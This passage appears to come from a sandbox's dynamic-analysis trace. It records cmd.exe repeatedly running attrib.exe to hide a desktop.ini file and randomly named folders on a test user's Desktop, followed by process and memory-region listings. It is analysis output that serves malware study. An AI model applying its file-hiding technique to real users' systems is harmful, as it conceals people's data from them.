lpReturnSize=0x0 | out: lpAttributeList=0x2af0bc, lpPreviousValue=0x0) returned 1 [0136.934] GetStartupInfoW (in: lpStartupInfo=0x2af078 | out: lpStartupInfo=0x2af078*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0136.934] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0136.934] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af118*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, 
hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af164 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" ", lpProcessInformation=0x2af164*(hProcess=0x4c, hThread=0x50, dwProcessId=0xd24, dwThreadId=0xd28)) returned 1 [0136.936] CloseHandle (hObject=0x50) returned 1 [0136.937] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0136.937] GetEnvironmentStringsW () returned 0x3d2e28* [0136.938] FreeEnvironmentStringsW (penv=0x3d2e28) returned 1 [0136.938] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0137.004] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2af058 | out: lpExitCode=0x2af058*=0x0) returned 1 [0137.004] CloseHandle (hObject=0x4c) returned 1 [0137.004] _vsnwprintf (in: _Buffer=0x2af1a0, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af064 | out: _Buffer="00000000") returned 8 [0137.004] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0137.004] GetEnvironmentStringsW () returned 0x3d2e28* [0137.004] FreeEnvironmentStringsW (penv=0x3d2e28) returned 1 [0137.004] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0137.004] GetEnvironmentStringsW () returned 0x3d2e28* [0137.004] FreeEnvironmentStringsW (penv=0x3d2e28) returned 1 [0137.004] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af0bc | out: lpAttributeList=0x2af0bc) [0137.004] GetConsoleTitleW (in: lpConsoleTitle=0x2af4a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.004] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0137.004] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0137.004] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0137.005] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0xffffffff [0137.005] GetLastError () returned 0x2 [0137.005] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0xffffffff [0137.005] GetLastError () returned 0x2 [0137.005] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0x3d1488 [0137.005] FindClose (in: hFindFile=0x3d1488 | out: hFindFile=0x3d1488) returned 1 [0137.005] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0xffffffff [0137.005] GetLastError () returned 0x2 [0137.005] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0x3d1488 [0137.005] FindClose (in: hFindFile=0x3d1488 | out: hFindFile=0x3d1488) returned 1 [0137.005] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0137.005] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0137.005] GetConsoleTitleW (in: lpConsoleTitle=0x2af234, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.006] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af0bc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af184 | out: lpAttributeList=0x2af0bc, lpSize=0x2af184) returned 1 
[0137.006] UpdateProcThreadAttribute (in: lpAttributeList=0x2af0bc, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af17c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af0bc, lpPreviousValue=0x0) returned 1 [0137.006] GetStartupInfoW (in: lpStartupInfo=0x2af078 | out: lpStartupInfo=0x2af078*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0137.006] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0137.006] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af118*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af164 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"", lpProcessInformation=0x2af164*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd14, dwThreadId=0xd10)) returned 1 [0137.007] CloseHandle (hObject=0x4c) returned 1 [0137.007] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0137.007] GetEnvironmentStringsW () returned 0x3d38d0* [0137.007] FreeEnvironmentStringsW (penv=0x3d38d0) returned 1 [0137.007] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0137.196] 
GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af058 | out: lpExitCode=0x2af058*=0x0) returned 1 [0137.196] CloseHandle (hObject=0x50) returned 1 [0137.196] _vsnwprintf (in: _Buffer=0x2af1a0, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af064 | out: _Buffer="00000000") returned 8 [0137.196] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0137.196] GetEnvironmentStringsW () returned 0x3d38d0* [0137.196] FreeEnvironmentStringsW (penv=0x3d38d0) returned 1 [0137.197] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0137.197] GetEnvironmentStringsW () returned 0x3d38d0* [0137.197] FreeEnvironmentStringsW (penv=0x3d38d0) returned 1 [0137.197] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af0bc | out: lpAttributeList=0x2af0bc) [0137.197] _get_osfhandle (_FileHandle=1) returned 0x7 [0137.197] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0137.197] _get_osfhandle (_FileHandle=1) returned 0x7 [0137.197] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0137.197] _get_osfhandle (_FileHandle=0) returned 0x3 [0137.197] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0137.197] SetConsoleInputExeNameW () returned 0x1 [0137.197] GetConsoleOutputCP () returned 0x1b5 [0137.198] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0137.198] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.198] exit (_Code=0) Process: id = "144" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16620" os_pid = "0xd78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "143" os_parent_pid = "0xcb0" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = 
"CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14256 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14257 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14258 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14259 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 14260 start_va = 0xde0000 end_va = 0xde6fff entry_point = 0xde0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 14261 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14262 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14263 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14264 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 14265 start_va = 
0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14298 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14299 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14300 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 14301 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14302 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 14303 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 14304 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14305 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14306 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14307 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = 
"\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14308 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14309 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14310 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14311 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14312 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14313 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14314 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14315 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 14316 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") 
Region: id = 14317 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 201 os_tid = 0xd74 Process: id = "145" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea168a0" os_pid = "0xd24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "143" os_parent_pid = "0xcb0" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14318 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14319 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14320 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14321 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 14322 start_va = 0xb50000 end_va = 0xb56fff entry_point = 0xb50000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 14323 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = 
mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14324 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14325 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14326 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 14327 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14328 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14329 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14330 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14331 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 14332 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 14333 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 14334 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = 
"kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14335 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14336 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14337 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14338 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14339 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14340 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14341 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14342 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14343 start_va = 0x773e0000 end_va = 0x7742dfff 
entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14344 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14345 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 14346 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14347 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 202 os_tid = 0xd28 Process: id = "146" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea168a0" os_pid = "0xd14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "143" os_parent_pid = "0xcb0" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14348 start_va = 0x10000 end_va = 0x13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14349 start_va = 0x20000 end_va = 0x26fff entry_point = 0x20000 
region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 14350 start_va = 0x30000 end_va = 0x4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 14351 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 14352 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 14353 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14354 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14355 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14356 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 14357 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14358 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14359 start_va = 0x40000 end_va = 0x4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14360 start_va = 0x60000 end_va = 0xc6fff entry_point = 0x60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" 
(normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14361 start_va = 0x140000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 14362 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 14363 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 14364 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14365 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14366 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14367 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14368 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14369 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14370 start_va = 0x76b40000 end_va = 
0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14371 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14372 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14373 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14374 start_va = 